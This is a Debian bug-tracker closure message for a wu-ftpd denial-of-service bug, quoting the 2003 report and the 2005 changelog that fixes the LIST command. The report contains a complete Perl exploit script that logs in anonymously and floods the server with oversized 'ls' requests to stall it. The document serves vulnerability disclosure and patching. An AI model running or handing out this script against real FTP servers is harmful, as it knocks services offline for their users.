Your message dated Wed, 23 Feb 2005 19:17:26 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#219165: fixed in wu-ftpd 2.6.2-18
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 4 Nov 2003 18:39:44 +0000
>From [EMAIL PROTECTED] Tue Nov 04 12:39:34 2003
Return-path: <[EMAIL PROTECTED]>
Received: from web13805.mail.yahoo.com [216.136.175.15]
by master.debian.org with smtp (Exim 3.35 1 (Debian))
id 1AH65W-0002I8-00; Tue, 04 Nov 2003 12:39:34 -0600
Message-ID: <[EMAIL PROTECTED]>
Received: from [208.165.59.137] by web13805.mail.yahoo.com via HTTP; Tue, 04
Nov 2003 10:39:33 PST
Date: Tue, 4 Nov 2003 10:39:33 -0800 (PST)
From: Miguel Quesada <[EMAIL PROTECTED]>
Subject: DoS in WU-FTPD (exploit in 'ls')
To: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-4.0 required=4.0
tests=BAYES_70,HAS_PACKAGE
version=2.53-bugs.debian.org_2003_11_03
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_11_03
(1.174.2.15-2003-03-30-exp)
Package: wu-ftpd
Version: 2.6.2-3woody2
I found the following exploit and ran it on the
machines I administer... it wasn't nice...
----
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die
"usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "[EMAIL PROTECTED]";
$cols=1000000;#you can increase this value for more
destructive result ;)
print ":: Trying to connect to target system at:
$target...\n"; $ftp = Net::FTP->new($target, Debug =>
0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login:
$!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!\n";
$ftp->quit;
---
After this, the system stalls for a considerable long
time. Hope u guys found a workaround for this...
regards.
__________________________________
Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
http://antispam.yahoo.com/whatsnewfree
---------------------------------------
Received: (at 219165-close) by bugs.debian.org; 24 Feb 2005 00:23:46 +0000
>From [EMAIL PROTECTED] Wed Feb 23 16:23:46 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1D46nC-0002ms-00; Wed, 23 Feb 2005 16:23:46 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1D46h4-0007f5-00; Wed, 23 Feb 2005 19:17:26 -0500
From: Chris Butler <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#219165: fixed in wu-ftpd 2.6.2-18
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Wed, 23 Feb 2005 19:17:26 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 2
Source: wu-ftpd
Source-Version: 2.6.2-18
We believe that the bug you reported is fixed in the latest version of
wu-ftpd, which is due to be installed in the Debian FTP archive:
wu-ftpd_2.6.2-18.diff.gz
to pool/main/w/wu-ftpd/wu-ftpd_2.6.2-18.diff.gz
wu-ftpd_2.6.2-18.dsc
to pool/main/w/wu-ftpd/wu-ftpd_2.6.2-18.dsc
wu-ftpd_2.6.2-18_i386.deb
to pool/main/w/wu-ftpd/wu-ftpd_2.6.2-18_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Chris Butler <[EMAIL PROTECTED]> (supplier of updated wu-ftpd package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Tue, 22 Feb 2005 21:48:07 +0000
Source: wu-ftpd
Binary: wu-ftpd
Architecture: source i386
Version: 2.6.2-18
Distribution: unstable
Urgency: high
Maintainer: Chris Butler <[EMAIL PROTECTED]>
Changed-By: Chris Butler <[EMAIL PROTECTED]>
Description:
wu-ftpd - powerful and widely used FTP server
Closes: 156999 219165 231300 234292 236986 237328 243286 247764 254870 267177
267307 290813
Changes:
wu-ftpd (2.6.2-18) unstable; urgency=high
.
* Incorporates changes from NMUs
(closes: #267177, #231300, #243286, #254870, #234292, #267307, #236986)
* Fix DoS in the LIST command (closes: #219165)
* Remove '-g' option from ls arguments (closes: #247764)
* Compile with LFS support (closes: #156999, #290813)
* Compile with -DPARANOID by default (closes: #237328)
* Recode Catalan translation from latin1 to utf-8
Files:
2cfc2178b6edfff8843858d914e9e4a5 593 net extra wu-ftpd_2.6.2-18.dsc
e9c7fc7d0d08b7163f5cc15a07a8e3ca 124057 net extra wu-ftpd_2.6.2-18.diff.gz
003e320f3d2cf6a6d30426ee17b24e88 277868 net extra wu-ftpd_2.6.2-18_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFCHRoTDzQFd9CXomERAtoKAJ0QgTRDZcnnt1NNVmbbbqll8e9SvgCfdi3X
sAZkNgNVph1v0C/CD7AvO3I=
=KBz5
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
